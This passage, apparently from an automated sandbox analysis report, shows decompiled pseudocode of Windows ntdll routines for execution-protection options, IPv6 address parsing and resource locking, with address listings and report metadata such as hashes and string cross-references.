				if(E02547F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02563F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0251DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x25f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02563F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02520D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02563F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02528375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02563F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0258E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02563F92();
					_t38 = 1;
					L2:
					return E0251E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x02547f08
                                                0x02547f0f
                                                0x02547f12
                                                0x02547f1b
                                                0x02547f31
                                                0x02563ead
                                                0x02563eb4
                                                0x00000000
                                                0x00000000
                                                0x02563eba
                                                0x02563ecd
                                                0x02563ed2
                                                0x02563ee1
                                                0x02563ee7
                                                0x02563eec
                                                0x02563f12
                                                0x02563f18
                                                0x02563f1a
                                                0x00000000
                                                0x00000000
                                                0x02563f20
                                                0x02563f26
                                                0x02563f28
                                                0x00000000
                                                0x00000000
                                                0x02563f2e
                                                0x02563f30
                                                0x00000000
                                                0x00000000
                                                0x02563f3a
                                                0x02563f3b
                                                0x02563f53
                                                0x02563f64
                                                0x02563f69
                                                0x02563f6c
                                                0x02563f6d
                                                0x02563f6f
                                                0x0256e304
                                                0x0256e30f
                                                0x0256e315
                                                0x0256e31e
                                                0x0256e321
                                                0x0256e327
                                                0x0256e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0256e32f
                                                0x0256e32f
                                                0x0256e337
                                                0x0256e33a
                                                0x0256e33b
                                                0x0256e33d
                                                0x0256e33f
                                                0x0256e341
                                                0x0256e341
                                                0x0256e34e
                                                0x0256e353
                                                0x0256e358
                                                0x0256e35d
                                                0x0256e35f
                                                0x00000000
                                                0x00000000
                                                0x0256e365
                                                0x0256e365
                                                0x0256e368
                                                0x0256e36e
                                                0x00000000
                                                0x00000000
                                                0x0256e374
                                                0x0256e32f
                                                0x02563f75
                                                0x02563f7a
                                                0x02563f7c
                                                0x02563f7e
                                                0x02563f86
                                                0x02547f39
                                                0x02547f47
                                                0x02547f47
                                                0x02547f37
                                                0x02547f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02563F12
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0256E345
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02563F75
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02563F4A
                                                • ExecuteOptions, xrefs: 02563F04
                                                • Execute=1, xrefs: 02563F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02563EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0256E2FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: dd7c2f09f653881b87013fe60004cbbfc48c4cf0020f097eb987509899465047
                                                • Instruction ID: 2551058ac1b17fa621f4360d76adad718b6f0028d76e619d82989c9291cc4ecc
                                                • Opcode Fuzzy Hash: dd7c2f09f653881b87013fe60004cbbfc48c4cf0020f097eb987509899465047
                                                • Instruction Fuzzy Hash: 5941BB7168071D7AEB209E94DCC9FEBB3BDBF58704F0005A9A505E7080EB70AA458F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02550B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02550B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02528980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0251DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02550CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02550CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025506BA(_t135, _t178) == 0 || E02550A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02550CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02550CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025506BA(_t124, _t142) == 0 || E02550A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x02550b21
                                                0x02550b24
                                                0x02550b27
                                                0x02550b2a
                                                0x02550b2d
                                                0x02550b30
                                                0x02550b33
                                                0x02550b36
                                                0x02550b39
                                                0x02550b3e
                                                0x02550c65
                                                0x02550c68
                                                0x02550c6a
                                                0x02550c6f
                                                0x0257eb42
                                                0x00000000
                                                0x00000000
                                                0x0257eb48
                                                0x0257eb48
                                                0x02550c75
                                                0x02550c7a
                                                0x0257eb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0257eb5a
                                                0x02550c80
                                                0x02550c84
                                                0x0257eb98
                                                0x00000000
                                                0x00000000
                                                0x0257eba6
                                                0x02550cb8
                                                0x02550cba
                                                0x02550cd3
                                                0x02550cda
                                                0x02550ce4
                                                0x02550ce9
                                                0x00000000
                                                0x02550cec
                                                0x02550c8c
                                                0x0257eb63
                                                0x00000000
                                                0x00000000
                                                0x0257eb70
                                                0x0257eb75
                                                0x0257eb7d
                                                0x00000000
                                                0x00000000
                                                0x0257eb8c
                                                0x00000000
                                                0x0257eb8c
                                                0x02550c96
                                                0x00000000
                                                0x00000000
                                                0x02550ca2
                                                0x02550cac
                                                0x02550cb4
                                                0x00000000
                                                0x00000000
                                                0x02550b44
                                                0x02550b47
                                                0x02550b49
                                                0x00000000
                                                0x00000000
                                                0x02550b4f
                                                0x02550b50
                                                0x00000000
                                                0x00000000
                                                0x02550b56
                                                0x02550b62
                                                0x02550b7c
                                                0x02550bac
                                                0x02550a0f
                                                0x0257eaaa
                                                0x00000000
                                                0x0257eac4
                                                0x0257eac4
                                                0x02550bd0
                                                0x02550bd0
                                                0x02550bd4
                                                0x02550bd9
                                                0x00000000
                                                0x00000000
                                                0x02550bdb
                                                0x02550be0
                                                0x0257eb0e
                                                0x02550a1a
                                                0x00000000
                                                0x02550a1a
                                                0x0257eb1a
                                                0x0257eb1f
                                                0x0257eb27
                                                0x00000000
                                                0x00000000
                                                0x0257eb36
                                                0x00000000
                                                0x0257eb36
                                                0x02550bea
                                                0x00000000
                                                0x00000000
                                                0x02550bf6
                                                0x02550c00
                                                0x02550c03
                                                0x02550c0b
                                                0x00000000
                                                0x02550c0b
                                                0x0257eaaa
                                                0x00000000
                                                0x02550a15
                                                0x02550bb6
                                                0x00000000
                                                0x02550bc6
                                                0x02550bc6
                                                0x02550bcb
                                                0x02550c15
                                                0x00000000
                                                0x00000000
                                                0x02550c1d
                                                0x02550c20
                                                0x02550c21
                                                0x02550c24
                                                0x02550c24
                                                0x02550c26
                                                0x00000000
                                                0x02550c26
                                                0x02550bcd
                                                0x00000000
                                                0x02550bcd
                                                0x02550b89
                                                0x02550b89
                                                0x02550b90
                                                0x00000000
                                                0x00000000
                                                0x02550b96
                                                0x00000000
                                                0x02550b96
                                                0x02550a04
                                                0x02550a04
                                                0x02550b9a
                                                0x02550b9a
                                                0x02550b9b
                                                0x02550b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02550ba5
                                                0x02550ac7
                                                0x02550aca
                                                0x0257eacf
                                                0x00000000
                                                0x0257eade
                                                0x0257eade
                                                0x0257eae3
                                                0x00000000
                                                0x00000000
                                                0x0257eaf3
                                                0x0257eaf6
                                                0x0257eaf7
                                                0x0257eafe
                                                0x0257eb01
                                                0x00000000
                                                0x0257eb01
                                                0x0257eacf
                                                0x02550ad0
                                                0x02550ad4
                                                0x00000000
                                                0x00000000
                                                0x02550ada
                                                0x02550ae6
                                                0x02550c34
                                                0x00000000
                                                0x02550c47
                                                0x02550c49
                                                0x02550c4a
                                                0x02550c4e
                                                0x02550c51
                                                0x02550c54
                                                0x02550c57
                                                0x02550c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02550c60
                                                0x02550afb
                                                0x02550afe
                                                0x02550b02
                                                0x02550b05
                                                0x02550b08
                                                0x00000000
                                                0x02550b08
                                                0x02550ae6
                                                0x02550b44
                                                0x025509f8
                                                0x025509f8
                                                0x025509f9
                                                0x00000000
                                                0x00000000
                                                0x0257eaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: bf55e5ef4ec58f4ae53b0e0fb8caef544481422f0840f54bbfd95560fb0142b0
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: F7A1807190032ADACF25CF58C8647BEBBB9BF4A318F24846BDC42A72C0D7349645CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02550554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 49%
                                                			E02550554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0250F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02554FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02563F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02563F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0259217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02563F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02553915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0250F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02554FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02563F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02563F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0259217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02563F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02553915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02535384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0250F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02553915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0250F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02553915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0250F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02553915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E02535329(_t110, _t138);
																return E025353A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                0x0255055a
                                                0x0255055d
                                                0x02550563
                                                0x02550566
                                                0x025505d8
                                                0x025505e2
                                                0x025505e5
                                                0x00000000
                                                0x025505e7
                                                0x025505e7
                                                0x025505ea
                                                0x025505f3
                                                0x025505f3
                                                0x02550568
                                                0x02550568
                                                0x02550568
                                                0x02550569
                                                0x02550569
                                                0x02550569
                                                0x0255056b
                                                0x00000000
                                                0x00000000
                                                0x0257217f
                                                0x02572183
                                                0x0257225b
                                                0x0257225f
                                                0x02572189
                                                0x0257218c
                                                0x0257218f
                                                0x02572194
                                                0x02572199
                                                0x0257219d
                                                0x025721a0
                                                0x025721a2
                                                0x025721ce
                                                0x025721ce
                                                0x025721ce
                                                0x025721d0
                                                0x025721d6
                                                0x025721de
                                                0x025721e2
                                                0x025721e8
                                                0x025721e9
                                                0x025721ec
                                                0x025721f1
                                                0x025721f6
                                                0x00000000
                                                0x00000000
                                                0x025721f8
                                                0x025721fb
                                                0x02572206
                                                0x0257220b
                                                0x0257220c
                                                0x02572217
                                                0x02572226
                                                0x0257222b
                                                0x0257222c
                                                0x0257222f
                                                0x02572232
                                                0x02572235
                                                0x02572235
                                                0x0257223a
                                                0x0257223f
                                                0x02572241
                                                0x02572243
                                                0x02572248
                                                0x02572248
                                                0x0257224d
                                                0x0257224f
                                                0x02572262
                                                0x02572263
                                                0x02572268
                                                0x02572269
                                                0x02572269
                                                0x02572269
                                                0x0257226d
                                                0x00000000
                                                0x00000000
                                                0x02572276
                                                0x02572279
                                                0x0257227e
                                                0x02572283
                                                0x02572287
                                                0x0257228a
                                                0x0257228d
                                                0x0257228f
                                                0x025722bc
                                                0x025722bc
                                                0x025722bc
                                                0x025722be
                                                0x025722c4
                                                0x025722cc
                                                0x025722d0
                                                0x025722d6
                                                0x025722d7
                                                0x025722da
                                                0x025722df
                                                0x025722e4
                                                0x00000000
                                                0x00000000
                                                0x025722e6
                                                0x025722e9
                                                0x025722f4
                                                0x025722f9
                                                0x025722fa
                                                0x02572305
                                                0x02572314
                                                0x02572319
                                                0x0257231a
                                                0x0257231d
                                                0x02572320
                                                0x02572323
                                                0x02572323
                                                0x02572328
                                                0x0257232d
                                                0x0257232f
                                                0x02572331
                                                0x02572336
                                                0x02572336
                                                0x0257233b
                                                0x0257233d
                                                0x02572350
                                                0x02572351
                                                0x02572356
                                                0x02572359
                                                0x02572359
                                                0x0257235b
                                                0x0257235d
                                                0x02535367
                                                0x0253536b
                                                0x02535372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02572363
                                                0x02572363
                                                0x02572369
                                                0x0257236a
                                                0x0257236c
                                                0x02572371
                                                0x02572373
                                                0x00000000
                                                0x02572379
                                                0x02572379
                                                0x0257237a
                                                0x0257237f
                                                0x0257237f
                                                0x02572385
                                                0x02572386
                                                0x02572389
                                                0x0257238e
                                                0x02572390
                                                0x02535378
                                                0x0253537c
                                                0x02572396
                                                0x02572396
                                                0x02572397
                                                0x0257239c
                                                0x025723a2
                                                0x025723a3
                                                0x025723a6
                                                0x025723ab
                                                0x025723ad
                                                0x00000000
                                                0x025723b3
                                                0x025723b3
                                                0x025723b4
                                                0x025723b9
                                                0x025723ba
                                                0x025723ba
                                                0x025723bc
                                                0x025723bf
                                                0x00000000
                                                0x00000000
                                                0x02569153
                                                0x02569158
                                                0x0256915a
                                                0x0256915e
                                                0x02569160
                                                0x00000000
                                                0x02569166
                                                0x02569166
                                                0x02569171
                                                0x02569176
                                                0x02569176
                                                0x00000000
                                                0x02569160
                                                0x025723c6
                                                0x025723d7
                                                0x025723d7
                                                0x025723ad
                                                0x02572390
                                                0x02572373
                                                0x0257233f
                                                0x0257233f
                                                0x00000000
                                                0x0257233f
                                                0x02572291
                                                0x02572291
                                                0x02572293
                                                0x02572295
                                                0x0257229a
                                                0x025722a1
                                                0x025722a3
                                                0x025722a7
                                                0x025722a9
                                                0x00000000
                                                0x00000000
                                                0x025722ab
                                                0x025722ad
                                                0x025722af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025722af
                                                0x025722b1
                                                0x025722b4
                                                0x025722b4
                                                0x025722b6
                                                0x025353be
                                                0x025353be
                                                0x025353be
                                                0x025353c0
                                                0x00000000
                                                0x00000000
                                                0x025353cb
                                                0x025353ce
                                                0x025353d0
                                                0x025353d4
                                                0x025353d6
                                                0x00000000
                                                0x025353d8
                                                0x025353e3
                                                0x025353ea
                                                0x025353ea
                                                0x00000000
                                                0x025353d6
                                                0x00000000
